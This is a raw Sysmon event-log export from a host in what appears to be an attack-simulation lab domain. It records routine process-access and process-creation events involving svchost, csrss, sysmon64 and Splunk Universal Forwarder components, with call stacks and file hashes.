15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7E14-5FA1-8801-000000008801}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E14-5FA1-8801-000000008801}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.525{D28789B6-7E14-5FA1-8801-000000008801}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.008{D28789B6-7E13-5FA1-8701-000000008801}13522404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.914{D28789B6-7E15-5FA1-8901-000000008801}51124512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E15-5FA1-8901-000000008801}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7E15-5FA1-8901-000000008801}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E15-5FA1-8901-000000008801}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:13.790{D28789B6-7E15-5FA1-8901-000000008801}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.696{D28789B6-7E16-5FA1-8A01-000000008801}7324956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E16-5FA1-8A01-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 